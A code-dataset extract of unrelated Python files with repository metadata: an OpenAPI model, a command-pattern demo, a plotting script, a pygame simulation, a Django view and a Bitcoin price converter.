| 16.5625 | 53 | 0.660377 | 130 | 795 | 3.946154 | 0.323077 | 0.128655 | 0.023392 | 0.070175 | 0.348928 | 0.302144 | 0.263158 | 0.214425 | 0.214425 | 0.214425 | 0 | 0.025197 | 0.201258 | 795 | 47 | 54 | 16.914894 | 0.782677 | 0.335849 | 0 | 0.1 | 0 | 0 | 0.180095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0 | 0 | 0.15 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
6cb32f44a52f1c0281429f935c70345217dd11a0 | 5,105 | py | Python | xero_python/appstore/models/plan.py | gavinwhyte/xero-python | 53a028c3b7c51da1db203b616bf7b7a028a4a1d2 | [
"MIT"
] | null | null | null | xero_python/appstore/models/plan.py | gavinwhyte/xero-python | 53a028c3b7c51da1db203b616bf7b7a028a4a1d2 | [
"MIT"
] | null | null | null | xero_python/appstore/models/plan.py | gavinwhyte/xero-python | 53a028c3b7c51da1db203b616bf7b7a028a4a1d2 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Xero AppStore API
These endpoints are for Xero Partners to interact with the App Store Billing platform # noqa: E501
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class Plan(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"id": "str",
"name": "str",
"status": "str",
"subscription_items": "list[SubscriptionItem]",
}
attribute_map = {
"id": "id",
"name": "name",
"status": "status",
"subscription_items": "subscriptionItems",
}
def __init__(
self, id=None, name=None, status=None, subscription_items=None
): # noqa: E501
"""Plan - a model defined in OpenAPI""" # noqa: E501
self._id = None
self._name = None
self._status = None
self._subscription_items = None
self.discriminator = None
self.id = id
self.name = name
self.status = status
self.subscription_items = subscription_items
@property
def id(self):
"""Gets the id of this Plan. # noqa: E501
The unique identifier of the plan # noqa: E501
:return: The id of this Plan. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Plan.
The unique identifier of the plan # noqa: E501
:param id: The id of this Plan. # noqa: E501
:type: str
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def name(self):
"""Gets the name of this Plan. # noqa: E501
The name of the plan. It is used in the invoice line item description. # noqa: E501
:return: The name of this Plan. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Plan.
The name of the plan. It is used in the invoice line item description. # noqa: E501
:param name: The name of this Plan. # noqa: E501
:type: str
"""
if name is None:
raise ValueError(
"Invalid value for `name`, must not be `None`"
) # noqa: E501
self._name = name
@property
def status(self):
"""Gets the status of this Plan. # noqa: E501
Status of the plan. Available statuses are ACTIVE, CANCELED, and PENDING_ACTIVATION. # noqa: E501
:return: The status of this Plan. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Plan.
Status of the plan. Available statuses are ACTIVE, CANCELED, and PENDING_ACTIVATION. # noqa: E501
:param status: The status of this Plan. # noqa: E501
:type: str
"""
if status is None:
raise ValueError(
"Invalid value for `status`, must not be `None`"
) # noqa: E501
allowed_values = [
"ACTIVE",
"CANCELED",
"PENDING_ACTIVATION",
"None",
] # noqa: E501
if status:
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}".format( # noqa: E501
status, allowed_values
)
)
self._status = status
@property
def subscription_items(self):
"""Gets the subscription_items of this Plan. # noqa: E501
List of the subscription items belonging to the plan. It does not include cancelled subscription items. # noqa: E501
:return: The subscription_items of this Plan. # noqa: E501
:rtype: list[SubscriptionItem]
"""
return self._subscription_items
@subscription_items.setter
def subscription_items(self, subscription_items):
"""Sets the subscription_items of this Plan.
List of the subscription items belonging to the plan. It does not include cancelled subscription items. # noqa: E501
:param subscription_items: The subscription_items of this Plan. # noqa: E501
:type: list[SubscriptionItem]
"""
if subscription_items is None:
raise ValueError(
"Invalid value for `subscription_items`, must not be `None`"
) # noqa: E501
self._subscription_items = subscription_items
| 28.20442 | 126 | 0.56905 | 602 | 5,105 | 4.747508 | 0.189369 | 0.081176 | 0.055983 | 0.058782 | 0.531141 | 0.474808 | 0.439118 | 0.321554 | 0.228132 | 0.190343 | 0 | 0.027753 | 0.343585 | 5,105 | 180 | 127 | 28.361111 | 0.825127 | 0.400784 | 0 | 0.102564 | 1 | 0 | 0.163517 | 0.017666 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.025641 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cb33395406f43fe2ee837077f069c801b9bcf8e | 2,167 | py | Python | design_patterns/behavioral/command.py | Minkov/python-oop-2021-02 | bd387dde165f4338eed66c4bc0b4b516ee085340 | [
"MIT"
] | 2 | 2021-02-22T22:55:31.000Z | 2021-04-05T18:25:10.000Z | design_patterns/behavioral/command.py | Minkov/python-oop-2021-02 | bd387dde165f4338eed66c4bc0b4b516ee085340 | [
"MIT"
] | null | null | null | design_patterns/behavioral/command.py | Minkov/python-oop-2021-02 | bd387dde165f4338eed66c4bc0b4b516ee085340 | [
"MIT"
] | 2 | 2021-04-05T18:35:11.000Z | 2021-04-08T12:18:19.000Z | from abc import ABC, abstractmethod
class Command(ABC):
@abstractmethod
def execute(self):
pass
@abstractmethod
def un_execute(self):
pass
class AddCommand(Command):
def __init__(self, values, new_value):
self.values = values
self.new_value = new_value
def execute(self):
self.values.append(self.new_value)
def un_execute(self):
self.values.pop()
class SumCommand(Command):
def __init__(self, values):
self.values = values
def execute(self):
return sum(self.values)
def un_execute(self):
return sum(self.values)
class RemoveLastCommand(Command):
def __init__(self, values):
self.values = values
self.removed_value = None
def execute(self):
self.removed_value = self.values.pop()
def un_execute(self):
self.values.append(self.removed_value)
self.removed_value = None
class RemoveFirstCommand(Command):
def __init__(self, values):
self.values = values
self.removed_value = None
def execute(self):
self.removed_value = self.values.pop(0)
def un_execute(self):
self.values.insert(0, self.removed_value)
self.removed_value = None
class CommandsMemento:
def __init__(self, values):
self.state = list(values)
commands = []
values = []
while True:
command_text = input()
if command_text == 'END':
break
if command_text == 'REMOVE_LAST':
command = RemoveLastCommand(values)
elif command_text == 'REMOVE_FIRST':
command = RemoveFirstCommand(values)
elif command_text == 'SUM':
command = SumCommand(values)
else:
_, value = command_text.split(' ')
command = AddCommand(values, int(value))
commands.append(command)
mementos = []
for command in commands:
print(command.execute())
for memento in mementos:
print(memento.state)
print('----')
print(values)
for command in commands[::-1]:
print(command.un_execute())
print(values)
"""
ADD 5
ADD 6
SUM
REMOVE_FIRST
ADD 3
ADD 7
SUM
REMOVE_LAST
SUM
REMOVE_LAST
SUM
REMOVE_LAST
SUM
END
"""
| 18.210084 | 49 | 0.646054 | 262 | 2,167 | 5.148855 | 0.21374 | 0.126019 | 0.094885 | 0.059303 | 0.437361 | 0.404003 | 0.274277 | 0.243143 | 0.152706 | 0.152706 | 0 | 0.0043 | 0.248731 | 2,167 | 118 | 50 | 18.364407 | 0.824324 | 0 | 0 | 0.428571 | 0 | 0 | 0.016481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0.028571 | 0.014286 | 0.028571 | 0.342857 | 0.085714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cb4cc84649164fc13d24146a17efcfc7d6676a4 | 2,120 | py | Python | Ensemble_Movie.py | nchaparr/Sam_Output_Anls | c6736f7863b36d09738ac95b7cbde19ba69526cf | [
"MIT"
] | null | null | null | Ensemble_Movie.py | nchaparr/Sam_Output_Anls | c6736f7863b36d09738ac95b7cbde19ba69526cf | [
"MIT"
] | 1 | 2015-04-18T14:47:49.000Z | 2015-05-01T21:51:44.000Z | Ensemble_Movie.py | nchaparr/Sam_Output_Anls | c6736f7863b36d09738ac95b7cbde19ba69526cf | [
"MIT"
] | null | null | null | from netCDF4 import Dataset
import glob,os.path
import numpy as np
from scipy.interpolate import UnivariateSpline
from matplotlib import cm
import matplotlib.pyplot as plt
#import site
#site.addsitedir('/tera/phil/nchaparr/SAM2/sam_main/python')
#from Percentiles import *
from matplotlib.patches import Patch
import sys
sys.path.insert(0, '/tera/phil/nchaparr/python')
#import nchap_fun as nc
import matplotlib.animation as animation
from Ens_Profs import Get_Var_Arrays
from Make_Timelist import *
"""
Profiles/2d ims at a point
for a movie
may be pointless now -- data at longer delta ts
"""
#set up plot
dump_time_list, Times_hrs = Make_Timelists(1, 60, 28800)
dump_time = dump_time_list[59]
i=1
ims = []
ims1 = []
theFig = plt.figure()
#theFig1.clf()
#theAx = theFig.add_subplot(111)
#theAx1 = theFig.add_subplot(111)
#theAx.set_title('')
#theAx.set_xlabel('')
#theAx.set_ylabel('')
for dump_time in dump_time_list:
#getting horizontally averaged, ensemble averaged tracer
[tracer, theta, height] = Get_Var_Arrays(dump_time)
#[grad_tracer, tracer_peaks] = nc.Domain_Grad(tracer, height)
[yindex, xindex] = [13, 44]
#print yindex, xindex, tracer_peaks[yindex, xindex]
i=i+1
x = np.arange(0, 1600, 25)
y = height[0:64]
X,Y = np.meshgrid(x, y)
tslice = tracer[0:64, 13, :]
thetaslice = theta[0:64, 13, :]
ims.append((plt.pcolor(X, Y, tslice, norm=plt.Normalize(0, 30)),))
#ims.append((plt.pcolor(X, Y, thetaslice, norm=plt.Normalize(0, 30)),))
#ims.append(plt.plot(tracer[:, yindex, xindex], height, 'ko'))
#ims.append(plt.plot(theta[:, yindex, xindex], height, 'ko'))
#plt.savefig('/tera/phil/nchaparr/python/Plotting/July92013/pngs/for_point_movie/Point_Tracer_'+ str(i)+'.png', bbox_inches=0)
im_ani = animation.ArtistAnimation(theFig, ims, interval=500, repeat_delay=30000, blit=True)
#im_ani = animation.ArtistAnimation(theFig, ims, interval=1000, repeat_delay=30000, blit=True)
#im_ani.save('/tera/phil/nchaparr/python/Plotting/July92013/pngs/for_point_movie/im.mp4')
plt.show()
| 28.266667 | 130 | 0.706132 | 316 | 2,120 | 4.610759 | 0.439873 | 0.032944 | 0.043926 | 0.045299 | 0.238161 | 0.238161 | 0.218943 | 0.119423 | 0.07687 | 0.07687 | 0 | 0.046927 | 0.15566 | 2,120 | 74 | 131 | 28.648649 | 0.767039 | 0.438208 | 0 | 0 | 0 | 0 | 0.024436 | 0.024436 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.366667 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6cbf415d6c7f56e53145504a706d0df172e83094 | 14,720 | py | Python | clique_main_1.py | mccrimmonmd/clique | d6539a4530acf5c5cf85dac2eb520fa69f3a310a | [
"MIT"
] | null | null | null | clique_main_1.py | mccrimmonmd/clique | d6539a4530acf5c5cf85dac2eb520fa69f3a310a | [
"MIT"
] | null | null | null | clique_main_1.py | mccrimmonmd/clique | d6539a4530acf5c5cf85dac2eb520fa69f3a310a | [
"MIT"
] | null | null | null | """
Version 1:
- It begins
- For some reason, this version of the decision code (in Shape.move) just makes
every shape move up and to the left
"""
from __future__ import division
import pygame, pygame.locals, math, random
RAND = random.Random()
RAND.seed()
UP = 0
DOWN = 1
RIGHT = 2
LEFT = 3
STAY = 4
PLAYER_MOVEMENT = 2
OFFSET = [0, 0]
SHAPE_TYPES = ['triangle', 'square', 'pentagon', 'hexagon', 'circle']
SHAPE_SIDES = {
'circle': 1, 'hexagon': 6, 'pentagon': 5, 'square': 4, 'triangle': 3}
SHAPE_MEAN = {
'circle': 35, 'hexagon': 40, 'pentagon': 45, 'square': 70, 'triangle': 80}
SHAPE_DEV = {
'circle': 5, 'hexagon': 6, 'pentagon': 7, 'square': 9, 'triangle': 10}
MAGIC_CONSTANT = 2 / len(SHAPE_TYPES)
# if the dividend is 1, all shape types will be generated equally
# if the dividend is > 1, the distribution of shapes will be skewed in favor
# of fewer sides.
# if the dividend is >= the divisor, only triangles will be generated.
LINE_OF_SIGHT = 500
STROKE_WIDTH = 1
NUM_SHAPES = 50
MAX_AGE = 10000
BLACK = pygame.color.Color(0,0,0)
WHITE = pygame.color.Color(255,255,255)
def main(player, shapes, size, period):
pygame.init()
pygame.key.set_repeat(25, 25)
screen = pygame.display.set_mode(size)
TICK = pygame.locals.USEREVENT + 1
pygame.time.set_timer(TICK, period)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP:
player.move_player(UP)
elif event.key == pygame.K_DOWN:
player.move_player(DOWN)
elif event.key == pygame.K_RIGHT:
player.move_player(RIGHT)
elif event.key == pygame.K_LEFT:
player.move_player(LEFT)
#elif event.key == pygame.K_SPACE:
#pass
elif event.type == TICK:
screen.fill(WHITE)
# these loops must run consecutively because shapes calculate
# new positions based on the old positions of other shapes;
# discrete timesteps are maintained with the Shape.pos and
# Shape.nextpos variables. A shape's actual position is only
# updated in its draw method.
for shape in shapes:
if shape != player: shape.move()
for shape in shapes:
if shape != player: shape.draw(screen)
# the player should always be on top, so it gets rendered last
player.draw(screen)
pygame.display.flip()
# end main()
class Shape(object):
def __init__(self, position, shape_type, side_length, color, persona, age=0):
self.pos = position
self.nextpos = list(position)
self.direction = STAY
self.shape_type = shape_type
self.side_length = side_length # for circles, side_length = radius
self.color = color
self.persona = persona
self.age = age
self.points = makepoints(self.pos, self.shape_type, self.side_length)
def move(self):
# KEEP TRACK OF CURRENT DIRECTION; VOTE TO CHANGE IT OR NOT
# (shapes should have a certain amount of inertia)
# the shape should lose its inertia if its personal space is invaded #
if RAND.random() < .25: # shape is changing direction
# 0 for UP, 1 for DOWN, 2 for RIGHT, 3 for LEFT, 4 for STAY
votes = [0,0,0,0,0]
self_type = self.shape_type
self_r = self.color.r
self_g = self.color.g
self_b = self.color.b
self_size = self.side_length
rgb_tolerance = self.persona.rgb_tolerance
#size_tolerance = self.persona.size_tolerance
space_tolerance = self.persona.personal_space
xpos = self.pos[0]
ypos = self.pos[1]
ups = 0
downs = 0
rights = 0
lefts = 0
stays = 0
for shape in shapes:
xdist = xpos - shape.pos[0]
ydist = ypos - shape.pos[1]
totaldist = math.sqrt(xdist**2 + ydist**2)
if totaldist < LINE_OF_SIGHT:
approach = closer(xdist, ydist)
avoid = further(xdist, ydist)
if approach == 0 or avoid == 0: ups += 1
if approach == 1 or avoid == 1: downs += 1
if approach == 2 or avoid == 2: rights += 1
if approach == 3 or avoid == 3: lefts += 1
if approach == 4 or avoid == 4: stays += 1
assert approach != avoid
#print approach, avoid
if totaldist < space_tolerance:
votes[avoid] += space_tolerance - int(totaldist)
if self_type != shape.shape_type:
#votes[approach] += 3
#votes[STAY] += 1
#else:
votes[avoid] += 3
if (self_r - rgb_tolerance <=
shape.color.r <=
self_r + rgb_tolerance):
votes[approach] += 1
#else:
#votes[avoid] += 1
if (self_g - rgb_tolerance <=
shape.color.g <=
self_g + rgb_tolerance):
votes[approach] += 1
#else:
#votes[avoid] += 1
if (self_b - rgb_tolerance <=
shape.color.b <=
self_b + rgb_tolerance):
votes[approach] += 1
#else:
#votes[avoid] += 1
#if (self_size - size_tolerance <=
#shape.side_length <=
#self_size + size_tolerance):
#votes[approach] += 1
#else:
#votes[avoid] += 1
direction = bestvote(votes)
print votes, ups, downs, rights, lefts, stays
else: # shape is not changing direction
direction = self.direction
if direction == UP: self.nextpos[1] -= 1
elif direction == DOWN: self.nextpos[1] += 1
elif direction == RIGHT: self.nextpos[0] += 1
elif direction == LEFT: self.nextpos[0] -= 1
# if direction == STAY: do nothing
self.direction = direction
def move_player(self, direction):
# modify offset in *opposite* direction
# (to keep "camera" centered on player)
if direction == UP:
OFFSET[1] += PLAYER_MOVEMENT
elif direction == DOWN:
OFFSET[1] -= PLAYER_MOVEMENT
elif direction == RIGHT:
OFFSET[0] -= PLAYER_MOVEMENT
elif direction == LEFT:
OFFSET[0] += PLAYER_MOVEMENT
def draw(self, surface):
if self == player:
pygame.draw.circle(surface, self.color, self.pos, self.side_length)
pygame.draw.circle(surface, BLACK, self.pos,
self.side_length, STROKE_WIDTH)
else:
xpos = self.pos[0] + OFFSET[0]
ypos = self.pos[1] + OFFSET[1]
# if the shape isn't visible, don't bother drawing it
offscreen = (xpos > size[0] + self.side_length or
xpos < -self.side_length or
ypos > size[1] + self.side_length or
ypos < -self.side_length)
if not offscreen:
if self.shape_type == 'circle':
pygame.draw.circle(surface, self.color, (xpos, ypos),
self.side_length)
pygame.draw.circle(surface, BLACK, (xpos, ypos),
self.side_length, STROKE_WIDTH)
else: # praw a polygon centered at self.pos
pygame.draw.polygon(surface, self.color, self.offset_points())
pygame.draw.polygon(surface, BLACK, self.offset_points(),
STROKE_WIDTH)
#else: print("This shape (of type ", self.shape_type, ") is offscreen")
self.update_position()
self.age += 1
if self.age > MAX_AGE:
shapes.remove(self)
shapes.append(generate_shape())
def update_position(self):
if self.shape_type != 'circle':
xdiff = self.nextpos[0] - self.pos[0]
ydiff = self.nextpos[1] - self.pos[1]
for point in self.points:
point[0] += xdiff
point[1] += ydiff
self.pos = (self.nextpos[0], self.nextpos[1])
def offset_points(self):
return [[point[0]+OFFSET[0], point[1]+OFFSET[1]] for point in self.points]
# end class Shape
def bestvote(votes):
maxpos = 0
maxval = votes[0]
for i in range(1, len(votes)):
if votes[i] >= maxval:
maxpos = i
maxval = votes[i]
return maxpos
#xdist = xpos - shape.pos[0]
#ydist = ypos - shape.pos[1]
"""
If xdist is positive, they are to the left of me.
If xdist is negative, they are to the right of me.
If ydist is positive, they are above me.
If ydist is negative, they are below me.
I will reduce the axis of greatest distance if I want to get closer.
I will increase the axis of least distance if I want to get further.
OR
I will randomly choose an axis to travel along.
"""
def closer(xdist, ydist):
if xdist == ydist == 0:
return STAY
if RAND.random() < 0.5:
#if xdist > ydist:
# move along the x axis
if xdist > 0:
return LEFT
else:
return RIGHT
else:
# move along the y axis
if ydist > 0:
return UP
else:
return DOWN
def further(xdist, ydist):
if RAND.random() < 0.5:
#if xdist < ydist:
# move along the x axis
if xdist > 0:
return RIGHT
else:
return LEFT
else:
# move along the y axis
if ydist > 0:
return DOWN
else:
return UP
class Personality(object):
def __init__(self, shape_type):
self.rgb_tolerance = int(RAND.gauss(50, 10))
#self.size_tolerance = int(RAND.gauss(SHAPE_MEAN[shape_type] / 2,
#SHAPE_DEV[shape_type] / 2))
self.personal_space = int(RAND.gauss(SHAPE_MEAN[shape_type] * 2,
SHAPE_DEV[shape_type] / 2))
print self.rgb_tolerance, self.personal_space
# end class Personality
def makepoints(position, shape_type, side_length):
halfside = side_length / 2
if shape_type == 'circle':
return None
elif shape_type == 'triangle':
h = math.sqrt(side_length**2 - (side_length/2)**2)
apothem = h / 2
top = [position[0], position[1] - apothem]
botleft = [position[0] - halfside, position[1] + apothem]
botright = [position[0] + halfside, position[1] + apothem]
return (top, botleft, botright)
elif shape_type == 'square':
topleft = [position[0] - halfside, position[1] - halfside]
topright = [topleft[0] + side_length, topleft[1]]
botleft = [topleft[0], topleft[1] + side_length]
botright = [topright[0], topright[1] + side_length]
return (topleft, topright, botright, botleft)
else:
numsides = SHAPE_SIDES[shape_type]
apothem = side_length / (2 * math.tan(math.pi / numsides))
angle = ((numsides - 2) * math.pi) / (numsides * 2)
xoffset = side_length * math.sin(angle)
yoffset = side_length * math.cos(angle)
radius = math.sqrt(halfside**2 + apothem**2)
if shape_type == 'pentagon':
top = [position[0], position[1] - radius]
second = [position[0] + xoffset, top[1] + yoffset]
third = [position[0] + halfside, position[1] + apothem]
fourth = [position[0] - halfside, position[1] + apothem]
fifth = [position[0] - xoffset, top[1] + yoffset]
return (top, second, third, fourth, fifth)
elif shape_type == 'hexagon':
topleft = [position[0] - halfside, position[1] - apothem]
topright = [position[0] + halfside, position[1] - apothem]
right = [position[0] + radius, position[1]]
botright = [position[0] + halfside, position[1] + apothem]
botleft = [position[0] - halfside, position[1] + apothem]
left = [position[0] - radius, position[1]]
return (topleft, topright, right, botright, botleft, left)
else:
print('unkown shape, type:', shape_type)
assert False
# end makepoints()
def choose_shape():
for shape_type in SHAPE_TYPES:
print(shape_type)
if shape_type == 'circle':
return shape_type
elif RAND.random() < MAGIC_CONSTANT:
return shape_type
def generate_shape(random_age=False):
if random_age:
age = RAND.randint(0, MAX_AGE-1)
else:
age = 0
r = g = b = 255
while r == 255 and g == 255 and b == 255: # only the player may be white
r = RAND.randint(0,255)
g = RAND.randint(0,255)
b = RAND.randint(0,255)
x = RAND.randint(0,size[0]) - OFFSET[0]
y = RAND.randint(0,size[1]) - OFFSET[1]
shape_type = choose_shape()
shape_size = 0
while shape_size <= 0:
shape_size = RAND.gauss(SHAPE_MEAN[shape_type], SHAPE_DEV[shape_type])
shape = Shape( (x,y), # new shapes always appear onscreen - problem?
shape_type,
int(shape_size),
pygame.color.Color(r, g, b),
Personality(shape_type),
age )
return shape
def generate_shapes():
shapes = []
for i in range(NUM_SHAPES):
shape = generate_shape(True)
shapes.append(shape)
return shapes
size = (1200, 900)
period = 25
player = Shape( (int(size[0]/2), int(size[1]/2)),
'circle',
25,
WHITE,
None,
None )
shapes = generate_shapes()
shapes.append(player)
main(player, shapes, size, period)
| 32.494481 | 83 | 0.531793 | 1,748 | 14,720 | 4.382151 | 0.168192 | 0.038773 | 0.020104 | 0.029373 | 0.256527 | 0.18799 | 0.112663 | 0.104047 | 0.079243 | 0.079243 | 0 | 0.027873 | 0.366304 | 14,720 | 452 | 84 | 32.566372 | 0.79331 | 0.127989 | 0 | 0.143345 | 0 | 0 | 0.017799 | 0 | 0 | 0 | 0 | 0 | 0.006826 | 0 | null | null | 0 | 0.006826 | null | null | 0.013652 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ccc8df451a2936e28cf2b4cd839f862b2e3add8 | 888 | py | Python | predictions/views.py | Mustapha-Belkacim/English-Premier-League-predictor | 2950d70e9aa80cc8c39f102029fb460b992f1e36 | [
"MIT"
] | 5 | 2018-02-27T18:03:45.000Z | 2018-07-23T11:40:55.000Z | predictions/views.py | Mustapha-Belkacim/Russia-2018-World-Cup-Predictor | 2950d70e9aa80cc8c39f102029fb460b992f1e36 | [
"MIT"
] | 1 | 2018-12-10T04:33:24.000Z | 2018-12-10T04:33:24.000Z | predictions/views.py | Mustapha-Belkacim/English-Premier-League-predictor | 2950d70e9aa80cc8c39f102029fb460b992f1e36 | [
"MIT"
] | 1 | 2018-02-26T14:23:40.000Z | 2018-02-26T14:23:40.000Z | from django.shortcuts import render
from django.views import View, generic
from .services.predictor import get_results
class Index(View):
template_name = 'predictions/index.html'
model = 'xgboost'
season = '16/17'
results = ''
leadboard = ''
def get(self, request):
self.results = get_results(self.season)
#self.results = predict_season(self.season, self.model)
return render(request, self.template_name, {'results' :self.results,
'leadboard':self.leadboard})
def post(self, request):
self.model = request.POST['model']
self.season = request.POST['season']
self.results = get_results(self.season)
return render(request, self.template_name, {'results' :self.results,
'leadboard':self.leadboard})
| 37 | 80 | 0.600225 | 94 | 888 | 5.595745 | 0.319149 | 0.104563 | 0.057034 | 0.079848 | 0.403042 | 0.403042 | 0.285171 | 0.285171 | 0.285171 | 0.285171 | 0 | 0.006339 | 0.289414 | 888 | 23 | 81 | 38.608696 | 0.827258 | 0.060811 | 0 | 0.315789 | 0 | 0 | 0.092437 | 0.026411 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.684211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ccd22609ab3e08378fdd219fad406bb1e80df1a | 7,546 | py | Python | forex_python/bitcoin.py | Otisey/forex-python | a34d074b8ee7411cd2868ea3945793ef43bf7965 | [
"MIT"
] | 505 | 2016-05-21T04:50:19.000Z | 2022-03-29T04:40:36.000Z | forex_python/bitcoin.py | Otisey/forex-python | a34d074b8ee7411cd2868ea3945793ef43bf7965 | [
"MIT"
] | 92 | 2016-05-22T09:26:23.000Z | 2022-02-18T11:26:56.000Z | forex_python/bitcoin.py | Otisey/forex-python | a34d074b8ee7411cd2868ea3945793ef43bf7965 | [
"MIT"
] | 166 | 2016-05-21T04:52:49.000Z | 2022-03-25T03:57:24.000Z | from decimal import Decimal
import simplejson as json
import requests
from .converter import RatesNotAvailableError, DecimalFloatMismatchError
class BtcConverter(object):
"""
Get bit coin rates and convertion
"""
def __init__(self, force_decimal=False):
self._force_decimal = force_decimal
def _decode_rates(self, response, use_decimal=False):
if self._force_decimal or use_decimal:
decoded_data = json.loads(response.text, use_decimal=True)
else:
decoded_data = response.json()
return decoded_data
def get_latest_price(self, currency):
"""
Get Lates price of one bitcoin to valid Currency 1BTC => X USD
"""
url = 'https://api.coindesk.com/v1/bpi/currentprice/{}.json'.format(currency)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi').get(currency, {}).get('rate_float', None)
if self._force_decimal:
return Decimal(price)
return price
return None
def get_previous_price(self, currency, date_obj):
"""
Get Price for one bit coin on given date
"""
start = date_obj.strftime('%Y-%m-%d')
end = date_obj.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi', {}).get(start, None)
if self._force_decimal:
return Decimal(price)
return price
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given date")
def get_previous_price_list(self, currency, start_date, end_date):
"""
Get List of prices between two dates
"""
start = start_date.strftime('%Y-%m-%d')
end = end_date.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = self._decode_rates(response)
price_dict = data.get('bpi', {})
return price_dict
return {}
def convert_to_btc(self, amount, currency):
"""
Convert X amount to Bit Coins
"""
if isinstance(amount, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
url = 'https://api.coindesk.com/v1/bpi/currentprice/{}.json'.format(currency)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi').get(currency, {}).get('rate_float', None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_btc = amount/price
return converted_btc
except TypeError:
raise DecimalFloatMismatchError("convert_to_btc requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given date")
def convert_btc_to_cur(self, coins, currency):
"""
Convert X bit coins to valid currency amount
"""
if isinstance(coins, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
url = 'https://api.coindesk.com/v1/bpi/currentprice/{}.json'.format(currency)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi').get(currency, {}).get('rate_float', None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_amount = coins * price
return converted_amount
except TypeError:
raise DecimalFloatMismatchError("convert_btc_to_cur requires coins parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given date")
def convert_to_btc_on(self, amount, currency, date_obj):
"""
Convert X amount to BTC based on given date rate
"""
if isinstance(amount, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
start = date_obj.strftime('%Y-%m-%d')
end = date_obj.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi', {}).get(start, None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_btc = amount/price
return converted_btc
except TypeError:
raise DecimalFloatMismatchError("convert_to_btc_on requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given Date")
def convert_btc_to_cur_on(self, coins, currency, date_obj):
"""
Convert X BTC to valid currency amount based on given date
"""
if isinstance(coins, Decimal):
use_decimal = True
else:
